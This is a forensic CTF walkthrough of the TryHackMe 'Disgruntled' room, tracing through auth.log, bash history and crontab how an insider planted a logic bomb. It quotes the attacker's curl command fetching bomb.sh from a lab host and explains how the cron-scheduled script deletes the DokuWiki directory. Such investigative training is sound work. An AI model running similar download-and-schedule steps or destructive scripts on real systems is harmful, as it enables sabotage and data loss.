This CTF helped me learned about how an IT person was planning a Logic Bomb attack.

You can access the room here: https://tryhackme.com/room/disgruntled

We need to check the logs of the IT Persons laptop to see what exactly happened.

1. The user installed a package on the machine using elevated privileges. According to the logs, what is the full COMMAND?

Answer: /usr/bin/apt install dokuwiki

In order to find this “logs” you need to go to /var/log and then open the auth.log file with an editor of choice.

There is an easier way to find the answer and that is to used the “grep” command: “grep -i install auth.log”

The auth.log file records authentication events related to user and system authentication. This file is used by system administrators and security analysts to monitor and troubleshoot authentication-related issues and to track unauthorized access attempts or security breaches.

2. What was the present working directory (PWD) when the previous command was run?

Answer: /home/cybert

This path of the directory can also be found on the same lines where you found the command that was run to install the package.

1. Which user was created after the package from the previous task was installed?

Answer: it-admin

We can again use the grep command to make our life easier: “grep -i adduser auth.log” to find the user that was added to the system.

2. A user was then later given sudo privileges. When was the sudoers file updated?

Answer: Dec 28 06:27:34

I had to skim through the logs since I didn’t really know how you would give someone privileges or like what is the keyword for it. So upon using the hint I find out I had to look for the keyword “visudo”, so then it was simple use the grep command to find the answer.

3. A script file was opened using the “vi” text editor. What is the name of this file?

Answer: bomb.sh

To find this answer I again used the grep command as the “keyword” was already give to us in the question.

As we can see the only file that comes up is “bomb.sh”

So, now we know that the IT Person has created a bombshell file to do some kind of harm to the system, so let’s investigate on how did the user got that file and what can it do?

1. What is the command used that created the file bomb.sh?

In order to find how this file was created or came from we need to go to “it-admin” directory and search for the commands that were run on the system.

Just move back to the root directory and then go to the home directory and from there on switch to the user “it-admin” directories. Here we can open the .bash_history file to see what commands have been run.

The second command shows that user shared the file through a SSH connection.

Answer: curl 10.10.158.38:8080/bomb.sh --output bomb.sh

2. The file was renamed and moved to a different directory. What is the full path of this file now?

To find this answer we need to visit the path that the user visited after removing the file — which you can see in the screenshot.

Path/Command: sudo nano /etc/crontab/

crontab is a Unix utility that allows users to schedule and automate tasks to be executed at specific times or intervals.

When you run that command it shows what task are set to autorun, on the left we see the time 0 8 * * *, this time is 08:00 AM, remember that linux time is based on unix system.

Answer: /bin/os-update.sh

3. When was the file from the previous question last modified? (Format: Month Day HH:MM)

Answer: Dec 28 06:29

To find the answer for this we can visit the path where the file is stored. Which is: cd /bin

Then: ls -al command to view the last time the file was edited.

4. What is the name of the file that will get created when the file from the first question executes?

In order to find the answer for this question we can use an editor to view the script: “nano os-update.sh”

At the end of the last line you can see the file name.

Answer: goodbye.txt

Now since we have the file, we know that the user definitely wants to execute this file, but when?

1. At what time will the malicious file trigger? (Format: HH:MM AM/PM)

Answer: 08:00 AM

Remember that we found a time associated with this file in the “/etc/crontab”, that is the time the user wants this file to be execute.

What does the script do?

1. The script runs the last command with the options -n 1 and -s "-90days", which lists the last login session for the user it-admin in the past 90 days. The output of this command is stored in the variable $OUTPUT.
2. The script checks if the variable $OUTPUT is empty or not using the if statement. If $OUTPUT is empty (i.e., the user it-admin has not logged in during the past 90 days), the script proceeds to the next step.
3. If $OUTPUT is empty, the script deletes the directory /var/lib/dokuwiki using the rm command with the option -r to delete the directory recursively.
4. The script creates a new file called goodbye.txt in the root directory (/) with the message “I TOLD YOU YOU’LL REGRET THIS!!! GOOD RIDDANCE!!! HAHAHAHA” and the signature “-mistermeist3r”. This message appears to be a logic bomb, suggesting that the deletion of the it-admin user’s login session has resulted in some negative consequences.

Now we have finally completed this CTF!